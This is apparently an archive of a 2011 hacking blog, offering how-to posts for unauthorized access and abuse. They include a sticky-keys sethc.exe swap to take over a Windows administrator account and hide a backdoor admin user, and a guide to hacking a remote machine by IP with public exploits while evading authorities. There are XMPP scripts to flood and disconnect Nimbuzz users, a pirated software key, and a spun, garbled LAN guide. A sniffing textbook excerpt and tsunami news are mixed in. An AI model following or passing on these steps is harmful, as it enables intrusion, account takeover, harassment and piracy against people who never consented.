Thursday, March 31, 2011

Hack administrator from Guest account.

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

  • Go to C:/windows/system32
  • Copy cmd.exe and paste it on desktop
  • rename cmd.exe to sethc.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

When asked to overwrite,overwrite the sethc.exe - rdhacker.blogspot.com

  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  • Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

Press shift key 5 times and command prompt will open - rdhacker.blogspot.com

  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  • Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

I hope that was informative..

Friday, March 25, 2011

How to Connect Two Pc By LAN For Internet

How to connect two PCs by LAN (Ethernet).There are many ways to connect two PC’s, but connecting them together by LAN is the simplest and most cost effectual way. Plus, you can use this mode for any digit of PC ofcourse if you have…
For this ,What you need:
1. 2 PCs with Ethernet Cards or Onboard Ethernet
Most new motherboards come with onboard Ethernet,
you can check this out in
My Computer > Properties > Hardware > Contrivance Manager >
Arrangement Adapter.
2. A Intersect Ethernet cable.
The habitual Ethernet cables won’t work, you must have a place a stop to crimped Ethernet cable which can be used to transmit data in both information.
3. A Ethernet Hub
A Ethernet hub is looked-for if you plot to connect more than two PCs. If you want to connect just two PCs, you can do it frankly without a hub.
How to do it:
1. Connect the intersect Ethernet cable to the LAN (RJ45) ports of both the PCs.
PC – 1:
- Go to My Computer > Properties > Computer Name.
- Exchange the Computer Name to A and Workgroup name to ABC and click OK to save changes.
- Go to Potential Panel > Arrangement Relations.
- Aptly click on your LAN tie and select Properties.
- Select Internet Protocol (TCP/IP) > Properties.
- Penetrate these values:
IP Address – 192.168.0.1
Subnet Mask – 255.255.255.0
- Leave the other fields bemused and click OK to save changes.
- Go to My Computer > Properties > Computer Name.
- Exchange the Computer Name to B and Workgroup name to ABC and click OK to save changes.
- Go to Potential Panel > Arrangement Relations.
- Aptly click on your LAN tie and select Properties.
- Select Internet Protocol (TCP/IP) > Properties.
- Penetrate these values:
IP Address – 192.168.0.2
Subnet Mask – 255.255.255.0
- Leave the other fields bemused and click OK to save changes.
- – -
With the relations and settings have been saved, both the PCs must be connected by LAN. You may need to restart both the PCs.
You can check if the tie is effective by pinging one PC from the other.
For PC-1, Start > Run > CMD > ping 192.168.0.2
For PC-2, Start > Run > CMD > ping 192.168.0.1
You can view the PC’s in My Arrangement Places.
Also You can now use this LAN tie to play multiplayer games or impart files.
You can also map a handbook on a additional PC to a community handbook by using
My Computer > Tools > Map Arrangement Handbook > Select Handbook Epistle and arrangement path of the mutual folder on the other PC

Thursday, March 24, 2011

Wednesday, March 23, 2011

BOMBUS SETTINGS FOR NEW USERS

1] LOGIN SETTINGS

1.Open Your Bombus or Bombusmod.
2.username : your id name. (dont put @nimbuzz.com)
3.password : your password
4.server: nimbuzz.com
5.host name/ip : openfire.nimbuzz.com
6.port: 5222
7.resource: www.roniksite.co.cc
8.save your account and connect.


2] CONFERENCE SETTINGS


1.Login Your Nimbuzz account
2.Then Go Conference Option On Your Bombus & select new conference
3.Then Type Your Chatroom Name Which room You Want To Enter.
4.Then Type server [ conference.nimbuzz.com]
5.Then Enter The Chatroom And Enjoying Chatting.


3] XML CONSOLE


1.Login Your Nimbuzz account
2.Goto Tool-->XML CONSOLE.
3.Enable it.


4] AUTOTRANS2CYR


1.Login Your Nimbuzz account.
2.Goto Tool->Option->Mark Autotrans2cyr
3.By this you can use stylish font in respective Bombus


5] HIDE CLIENT VERSION


1.Login Your Nimbuzz account.
2.Goto Tool->Option->UnMark Shared Platform Info


6] AUTORESPOND


1.Login Your Nimbuzz account.
2.Goto Status.
3.Then EDIT.Write your Message.
4.Set Priority 100
5.Mark ENABLE AUTORESPOND


7] INVISIBLE


1.Login Your Nimbuzz account.
2.Goto Status.
3.Set Status Invisible
4.BY this you are offline for your friends.
5.ie.you are hidden but online.

Friday, March 18, 2011

how-to-hack-remote-computer-using-ip

You can get the IP address of the victim using this post.

Now, what do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown


In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we don't even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.


220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400


Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage

So guys...i hope you now know how to hack into a computer using a known IP Address. Once you get IP Address of the victim, you are able to access and hack the computer remotely as described in the post.

Windows 7: what to do when System Won’t Stop Restarting (Looping on System Failure)

If you a bad driver installed on your system and have Windows 7 set to automatically restart upon system failure, your computer can become stuck in a loop of restarting. You can easily get out of this loop and work on fixing your system’s error.

1. Once the computer begns it’s next restart, press F8 on your keyboard repeatedly until the Advanced Boot Options screen appears. If the Windows startup logo shows up, then you will need to start over because you missed the opportunity.

2. Using the arrow keys on your keyboard, select Disable automatic restart on system failure and press Enter on your keyboard.

w7_adv_boot_options

Wndows 7 will start up and not automatically restart, allowing you to troubleshoot the error and hopefully fix your system’s problem.

Hack Windows Vista Logon Account Password

Steps to crack Windows Vista logon account password (in case of forgotten Vista Administrator password)

  1. Reboot the Windows Vista and boot up with Windows Vista installation DVD.
    Crack Windows Vista logon account password in minute with the Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.
  2. While the Windows Vista installation interface pops up, click the Repair You Computer link at the bottom-left corner.
  3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing Windows Vista, looks like Recovery Console in Windows XP:Startup Repair options is used to automatically fix problems that are preventing Windows Vista from starting.

    System Restore to restore Windows Vista setting to an earlier point in time.

    Windows Complete PC Restore to restore Windows Vista from a full system backup.

    Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that bundled with Windows setup media.

    Command Prompt is the target option of this Vista hacking guide. Click on this option now.

  4. In the Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.
  5. Click on the File menu, select Add / Remove Snap-in option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.
  6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button – that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.
  7. Click OK button and return to MMC windows. Under the Root Console in left panel, double-click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.
  8. Select the Set Password from the right-click menu to set a new password / reset old password.

Thursday, March 17, 2011

Create Anti-Kick Or Hanging Id Room New Nimbuzz Update

Antikik 1.First delet ur room ( entr room from nimbuzz ..then make
unprsistent from bmbus then l3ft room from nimbuzz and enter again.. u
will get msg this room doesnt exist any more) 2.Recreate the room from
nimbuzz.. 3.Left the room from nimbuzz and book mark it in bombus
4.Now configure it using bookmarks ... unmark prsistnt and send
...then config again mark prsistnt and send. 5.Repeat step 4(just
above step) 12times using bookmarks configon bombus.. 6.Then enter
left the room 7 times i.e( entr lft,entr lft,entr lft.entr lft.entr
lft.entr lft.entr lft.) 7.Hang id into room from baby ngiler or any
othr floodr.. 8.entr room from nimbuzz wait 20mints the hang id will
not get autokik..:d:d SYMBIAN DC CODE(NEW)By~Almamun55. <iq
from="yourid@nimbuzz.com/sp"to="targetid@nimbuzz.com/Nimbuzz_Symbian137"
id="getros"type="result"><queryxmlns="jabber:iq:roster"></query></iq>
you have old 2 scripts? >>if u want room anti kick Fast>use:2number
scripts delet room 3time send >>then use:number1 scripts create room
1time send >then use:3time enter left normal java or symbian Then 1
jid hang in room and finish your room anti kick :) HIDE YOUR MOBILE
DISCRIPTION IN CLIENT VERSION�B. Almamun55. (.1.) Go to tool then
click on option.(.2.) There you will see SHARED PLATFORM INFO unmark
it.(3.)Save and relogin your Account. . DC SYMBIAN CODE <br/><iq
to="TARGET_ID@nimbuzz.com/Nimbuzz_Symbian621" id="getros"
type="result"><query xmlns="jabber:iq:roster"></query></iq> ADD ROSTER
WIHT XML <presence to="TARGET_ID@nimbuzz.com"
type="subscribe"/><presence to="TARGET_ID@nimbuzz.com"
type="unsubscribe"/> DC BOMBUS CODE BY Almamun55 <iq
to="ROOM_NAME@conference.nimbuzz.com/RESRC" type="get"
id="ROOM_NAME@conference.nimbuzz.com/RESRC"><كون
xmlns="vcard-temp"/></iq> CHANGE SUBJECT ROOM BY Almamun55 <message
to="ROOM_NAME@conference.nimbuzz.com"
type="groupchat"><subject>http://www.bdnimbuzz.hexat.com</subject><body>BD
:D Haz CHange THe Subject To:amin..1</body></message> PRIVATE CHAT
WIHT XML <message to="TARGET_ID@nimbuzz.com/RESRC"
type="chat"><body>:DYou :DWill :Ddc :DBy amin..1:lol:</body><x
xmlns="jabber:x:event"></x></message>// CHECK CLIENT VERSION>BY
AMIN..1 <iq to="TARGET_NAME@nimbuzz.com/RESRCE" type="get"
id="getver"><query xmlns="jabber:iq:version"/></iq> Hang jid easily
with script in room~by LOVE_KINGBD. <presence
to="ROOM~NAME@conference.nimbuzz.com/username"
type="error"><status></status></presence> XML Code For Flood PV (DC)
Room Users - NEW~BY LOVE_KINGBD. <message to="ROOM
NAME@conference.nimbuzz.com/TARGET-ID" type="chat"
id="-486868572"><body>GOODZILA.TK - YOUR PM!</body><active
xmlns="http://jabber.org/protocol/chatstates"/></message> Change your
client version topc~BY LOVE_KINGBD. <iq to="id@nimbuzz.com/nimbuzz
midp" type="result" id="getver"><query
xmlns="jabber:iq:version"><name>home</name><version>123456</version><os>pc
version</os></query></iq> He Makes 2K/Day At Home! Learn How

configure bombus and create hanging it room with step by step process of using bombus

Bombus settings
................How to login Nimbuzz using Bombus................
open ur bombus then go to account settings
Username=
In user name enter ur user name!!!!
password=*****
server=nimbuzz.com
host ip name=openfire.nimbuzz.com
port 5222
Always remember one thing that no capital word use in this setting use
only small letter. If u used any of the one capital word in ur
settings then bombus will not connect.
Join room
Option then conference then option new conference
1=room name = indian*legend
2=host ip =conference.nimbuzz.com
3=nickname= ur user name
4=message limit=9999and for bookmark that room go ot optionsthen add
bookmark and after then join

!!!!!!!U can hang ur id in chat rooms permanently!!!!!!!
Step:1 Choose id u hav to hang.....set its resource BLANK....nd enter
in the room in which u wanna hang your id.
Step 2nd After entering in the room do unlimited flood in the rum
untill room not starts hanging. Once room starts hanging leave the
room immedietly and send this script 20 times widout entering
room....immedietly.
NOTE: Do not takemore time in sending the script after leave the room.
Sep 3rd (copy&paste)_________________________________<presenceto="ROOM_NAME@conference.nimbuzz.com/NICK_NAME"><preioity>1</priority></presence>................................
Note: By keeping ur resourse blank u can hang 1 id as many times as u
want........Thnx......


..........How to use a script in the Bombus.........
step 1st.First go to ur tool and then in the xml console.
Step 2nd. Now enable your xml console and put the xml script in it. (U
can get the xml script from the script section of this site.)
Step 3rd. U can use copy paste option of your phone for unlimited flooding.
step 4th. Write the name of the user who have been flooded by u in the
place of target id.
Step 5th. After doing ubove four step press ok or send the script..
NOTE: When u use a script in a wrong way or using illegal tags it
disconnect urself.

Our World: New Softwares and Applications for Nimbuzz and Mig33 tricks

Our World: New Softwares and Applications for Nimbuzz and Mig33 tricks

Hello Friends

We have done several new changes and updated our site for you.
Now we recently had added several new softwares related to nimbuzz
hacks and tricks. To download and use this applications you hav to
just do 10 post and you will be able to enter the members area. So
just show your skills to your friends. connect us

Regards,
The Our World Team.

www.roniksite.co.cc

Monday, March 14, 2011

DOWNLOAD RONIK MODIFIED POWER DC DISCONNECTER

To download it you have to become a member for free
its very easy just 10 post
Then youcan able to DC Disconnect any one

DOWNLOAD

JCreator Pro 4.5 KEY DOWNLOAD LINK For Full Verson

JCreator Pro 4.5 DOWNLOAD LINK For Full Verson : Username: P145460-Michael Roberts Key: 00HT98-RDJ71Y-15CYPM-DR7H1E-T681FV-38YP89-CXN0C0-DKPQ1C-F8JT2R.

Sunday, March 13, 2011

Goolag New Hacking tool From Cult of the Dead Cow



Goolag is a new hacking tool created by legendary hacker group"Cult of the Dead Cow"
this tool is freeware and also open source, hacker can take action with this tool easily by using GOOGLE

more info and download: www.goolag.org

Complete Hacking Tutorials



Ok...another Hacking tutorial,and this time from Cimoot_cool.
I hope you aren't get bored....

Download And Watch Here

The Most Wanted Hacking Book 2008



Two Chapter Hacking ook That can change your skill;
don't weist your time looking around for hacking shit....you will find more information about hacking and security

ok just download Here

New: Big Hacking Tool Kit (Internet Security)



This Is re Upload of Hacking Tool kit
This Complete Security tool kit for penetration testing and many more
ok just download here

Lets Hack Your Game Consoles



Whether you like to get your hands dirty with hacking hardware or whether you're an aspiring game developer, you will enjoy this unique book."Game Console Hacking" puts all the information you need in one convenient place.
If you just want to do the hack without worrying about the underlying theory behind it, you can do that, and the step-by-step sections include pictures and "how to" instruction.If that sounds like something out of your league, you can always take on a more sensible project like changing the color of the LED on your NES.

Many more hacks and modifications!

Get it HERE

The Ultimate Software for Cracking...yummy



How many software/program that you wanna have?....I'am Sure thats alot....since many big software developer creats more interactiv, fun, cool design for us, from graphic designer program, music player software or for those who addicted with internet/computer security ( hacker..?).but there one problem that stop your way, "expensive price"...... hey...think twice guys!. why not use black hacking program that can blow that expensive Price. ok enough for chit chat here I got oe program that can allow you to exploiting any shareware program.

download here

1000 Complete hacking tutorial





Ok....this is not the new one but i'm sure it's valuable for those who want to learn more about internet security and others.
I can't talk too much, This ebook containing many methodes and practicals of hacking....so learn..learn...learn
LOL

get it here.....
Download

Hacking the Code: ASP.NET Web Application Security


Another Web Application Security, create, maintain your ASP.Net Web Application.....
Test Your Web Application Security
And May be you can designing secure and easy maintain web application though no application safe on the internet.....everythings are fragile but wecan minimizing the risk

Go get Here

Download

How To Hack Wireless Network with Password

When we found some unencrypted wireless network we always feel happy coz we can pass on it. but How about network secure with password..?, we know there so many passworded network around us...., gaining access to that network isn't easy.....but wait, if you find the trick that turn your maind....so lets go find this trick.......

this is your responsibility.......take care

get Here

Download

Hack cable Modem and increase Internet Connection Up to 1Mbps

Bored with your DSL connection..?
ok this tutorial will guide you how incresase your Internet connection with hack the cable modem.
before that please read this


• This process is real and can increase the speeds you get from your cable service.

• This guide may not work with all modems it is currently only known to work with surfboard modems but should work with others.

• No matter how much you uncap you can be caught JUST AS EASILY use at your own risk.

• Don't be disappointed if this does not work for you certain configurations with your modem or isp may prevent you from properly performing this process.

• I CANNOT help you if you do NOT have a Surfboard modem.

• Finally please read through all of the documentation before asking me or anyone else for support thank you.

• Every Step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.

Protocol Sniffing: A Case Study

At one point in time, all user access to computing facilities in the organization under study
(the university at which the author is employed) was done via terminals. It was not practical to
hardwire each terminal to the host, and users needed to use more than one host. To solve these
two problems, Central Computing used a switch (an AT&T ISN switch) between the terminals
and the hosts. The terminals connected to the switch so that the user had a choice of
hosts. When the user chose a host the switch connected the terminal to the chosen host via a
very real, physical connection. The switch had several thousand ports and was, in theory,
capable of setting up connections between any pair of ports. In practice, however, some ports
attached to terminals and other ports attached to hosts. Figure 6.1 illustrates this setup.
Figure 6.1
Case study system
before networking.
~2500 Input
~400 Output
[SN Switcher]
IBM Mainframe
DEC Vax
DEC Vax
Multiplexor
To make the system more flexible, the central computing facility was changed to a new system
that uses a set of (DEC 550) Ethernet terminal servers with ports connected to the switch,
rather than the old system, which used a fixed number of switch ports connected to each host.
The new terminal servers are on an Ethernet segment shared by the hosts in the central
machine room.

Sniffing: How It Threatens Security

Sniffing data from the network leads to loss of privacy of several kinds of information that
should be private for a computer network to be secure. These kinds of information include the
following:
n Passwords
n Financial account numbers
n Private data
n Low-level protocol information
The following subsections are intended to provide examples of these kinds.
Sniffing Passwords
Perhaps the most common loss of computer privacy is the loss of passwords. Typical users type
a password at least once a day. Data is often thought of as secure because access to it requires a
password. Users usually are very careful about guarding their password by not sharing it with
anyone and not writing it down anywhere.
Passwords are used not only to authenticate users for access to the files they keep in their
private accounts but other passwords are often employed within multilevel secure database
systems. When the user types any of these passwords, the system does not echo them to the
computer screen to ensure that no one will see them. After jealously guarding these passwords
and having the computer system reinforce the notion that they are private, a setup that sends
each character in a password across the network is extremely easy for any Ethernet sniffer to
see. End users do not realize just how easily these passwords can be found by someone using a
simple and common piece of software.
Sniffing Financial Account Numbers
Most users are uneasy about sending financial account numbers, such as credit card numbers
and checking account numbers, over the Internet. This apprehension may be partly because of
the carelessness most retailers display when tearing up or returning carbons of credit card
receipts. The privacy of each user’s credit card numbers is important. Although the Internet is
by no means bulletproof, the most likely location for the loss of privacy to occur is at the
endpoints of the transmission. Presumably, businesses making electronic transactions are as
fastidious about security as those that make paper transactions, so the highest risk probably
comes from the same local network in which the users are typing passwords.
However, much larger potential losses exist for businesses that conduct electronic funds
transfer or electronic document interchange over a computer network. These transactions
involve the transmission of account numbers that a sniffer could pick up; the thief could then
transfer funds into his or her own account or order goods paid for by a corporate account.
Most credit card fraud of this kind involves only a few thousand dollars per incident.
Sniffing Private Data
Loss of privacy is also common in e-mail transactions. Many e-mail messages have been
publicized without the permission of the sender or receiver. Remember the Iran-Contra affair
in which President Reagan’s secretary of defense, Caspar Weinberger, was convicted. A crucial
piece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer.
The e-mail was not intercepted in transit, but in a typical networked system, it could have
been. It is not at all uncommon for e-mail to contain confidential business information or
personal information. Even routine memos can be embarrassing when they fall into the wrong
hands.

Sniffing: How It Is Done

In a shared media network, such as Ethernet, all network interfaces on a network segment have
access to all of the data that travels on the media. Each network interface has a hardware-layer
address that should differ from all hardware-layer addresses of all other network interfaces on
the network. Each network also has at least one broadcast address that corresponds not to an
individual network interface, but to the set of all network interfaces. Normally, a network
interface will only respond to a data frame carrying either its own hardware-layer address in
the frame’s destination field or the “broadcast address” in the destination field. It responds to
these frames by generating a hardware interrupt to the CPU. This interrupt gets the attention
of the operating system, and passes the data in the frame to the operating system for further
processing.
Note The term “broadcast address” is somewhat misleading. When the sender wants to
get the attention of the operating systems of all hosts on the network, he or she uses
the “broadcast address.” Most network interfaces are capable of being put into a
“promiscuous mode.” In promiscuous mode, network interfaces generate a hardware
interrupt to the CPU for every frame they encounter, not just the ones with
their own address or the “broadcast address.” The term “shared media” indicates to
the reader that such networks broadcast all frames—the frames travel on all the
physical media that make up the network.
At times, you may hear network administrators talk about their networking trouble spots—
when they observe failures in a localized area. They will say a particular area of the Ethernet is
busier than other areas of the Ethernet where there are no problems. All of the packets travel
through all parts of the Ethernet segment. Interconnection devices that do not pass all the
frames from one side of the device to the other form the boundaries of a segment. Bridges,
switches, and routers divide segments from each other, but low-level devices that operate on
one bit at a time, such as repeaters and hubs, do not divide segments from each other. If only
low-level devices separate two parts of the network, both are part of a single segment. All
frames traveling in one part of the segment also travel in the other part.
The broadcast nature of shared media networks affects network performance and reliability so
greatly that networking professionals use a network analyzer, or sniffer, to troubleshoot
problems. A sniffer puts a network interface in promiscuous mode so that the sniffer can
monitor each data packet on the network segment. In the hands of an experienced system
administrator, a sniffer is an invaluable aid in determining why a network is behaving (or
misbehaving) the way it is. With an analyzer, you can determine how much of the traffic is due
to which network protocols, which hosts are the source of most of the traffic, and which hosts
are the destination of most of the traffic. You can also examine data traveling between a
particular pair of hosts and categorize it by protocol and store it for later analysis offline. With
a sufficiently powerful CPU, you can also do the analysis in real time.
Most commercial network sniffers are rather expensive, costing thousands of dollars. When
you examine these closely, you notice that they are nothing more than a portable computer
with an Ethernet card and some special software. The only item that differentiates a sniffer
from an ordinary computer is software. It is also easy to download shareware and freeware
sniffing software from the Internet or various bulletin board systems.
The ease of access to sniffing software is great for network administrators because this type of
software helps them become better network troubleshooters. However, the availability of this
software also means that malicious computer users with access to a network can capture all the
data flowing through the network. The sniffer can capture all the data for a short period of
time or selected portions of the data for a fairly long period of time. Eventually, the malicious
user will run out of space to store the data—the network I use often has 1000 packets per
second flowing on it. Just capturing the first 64 bytes

sniffing

Sniffing is the use of a network interface to receive data not intended for the machine in which
the interface resides. A variety of types of machines need to have this capability. A token-ring
bridge, for example, typically has two network interfaces that normally receive all packets
traveling on the media on one interface and retransmit some, but not all, of these packets on
the other interface. Another example of a device that incorporates sniffing is one typically
marketed as a “network analyzer.” A network analyzer helps network administrators diagnose a
variety of obscure problems that may not be visible on any one particular host. These problems
can involve unusual interactions between more than just one or two machines and sometimes
involve a variety of protocols interacting in strange ways.
Devices that incorporate sniffing are useful and necessary. However, their very existence
implies that a malicious person could use such a device or modify an existing machine to snoop
on network traffic. Sniffing programs could be used to gather passwords, read inter-machine
e-mail, and examine client-server database records in transit. Besides these high-level data, lowlevel
information might be used to mount an active attack on data in another computer
system.

Saturday, March 12, 2011

Nimbuzz hack mindana8 multi id maker

Have you a powerful pacemaker ID Maltese
IPhone etc with a small program known types of servers to create your own email

This plan in no way lose
Download powerful pacemaker ID



Tags: yahoo - download yahoo - yahoo download - new yahoo - yahoo strong - strong booters download - download new yahoo - yahoo is the best - super yahoo - yahoo deadly - boot - Yahoo tools - drawing his CD - Veisi drawing - tools Rome - Rome ads - ads in Rome - Advertise on Yahoo ROOMS - Rome Yahoo - Yahoo spammers - spammers Yahoo - identify online and offline - offline - offline - Rome Conference rejected - Crocker - crackerbest - crackerbest download - Download the crackers - crackers new - ID Cracking - Cracking Email - Password Cracking - Kirk Strong - crackerbest no Peru - Peru crackerbest - boot - a boot ID - ID with a boot - booters with a login ID s - with multi yahoo ID S login - or Dyskankt boot up - booters to boot - Best, Kvdvm Booter - Booter want to keep working - until booters who work - Amkvzsh boot - education yahoo - yahoo What - what is the boot - what is the boot - how booters Working - working booters - Education booters - Who wants to yahoo - I want booters - Boot World - booters Iran - Iran's Boot - Option is yahoo - yahoo is working with education - education to boot - all people within the Roman booters - Boot Gkrdn group - yahoo Hoc - Multi Booter - Download -

Nimbuzz Hack Enemy Room Destroyer



Nimbuzz Hack lOCK ROOM_X4BUZZ_NEW LIGHT 2011



baraye download be edame matlaba bravid
enjoy

download

enjoy.............................

nimbuzz hack Mafia Hidden Flooder v2.0.4.0 (Flooding Room And Private)



New Features:-
*flood by 15 jids at 1 time
*flooding pv ,jams da user
*flooding rum makes it hang and slow
*program for autoflud



Friday, March 11, 2011

Tsunami headed for US after 8.9 earthquake hits Japan

A huge 8.9-magnitude earthquake off the coast of Japan triggered a
23-foot-tall tsunami that has devastated parts of the country. Now,
Hawaii, Alaska and much of the West Coast are expected to be hit by
the powerful waves.
A horrific 8.9 magnitute earthquake about 80 miles off the coast of
Japan triggered a devastating tsunami that crashed into the island
nation at about 2:20 am local time today. The deadly wave, which
measured 23-feet-tall, has killed at least 60 people, and injured
countless more. Blackouts caused by the quake spread as far as Russia
and South America. Parts of the United States, including Alaska,
Hawaii and much of the West Coast — from Washington state to the
California-Mexico border — are now in danger of a possible tsunami
hit.
The National Oceanic and Atmospheric Administration (NOAA) has issued
a tsunami warning/advisory for Hawaii, the West Coast and Alaska.
Walls of water as high as 6-feet could begin hitting Hawaii as early
as 3am local time (5am PST). By about 7am PST, the tsunami could begin
to hit parts of Oregon, followed by the Washington and California
coasts. NOAA officials say the waves to hit the West Coast should be
relatively small, and are expected to cause no major damage.
To view a complete list of expected tsunami strike times, click here.
In Japan, the situation is far worse. According to the United States
Geological survey, the 8.9-magnitude quake is the fifth largest
earthquake on Earth in over 100 years of recorded history. Cars, boats
and houses were swept away as the resulting killer wave spread its
path of destruction, which covered a 1,300-mile stretch of coast line
that affected dozens of cities and villages.
The Japanese government has declared a state of emergency at a nuclear
power plant after a cooling system failed. Eleven of Japan's nuclear
reactors were shut down immediately following the quake.
A number of Japan's major industrial plants have been shut down in the
wake of the disaster, including factories of Sony, Nissan, Toyota,
Honda, and beermaker Sapporo, Bloomberg reports. One Honda worker was
killed after a wall collapsed on top of him. Thirty other workers at
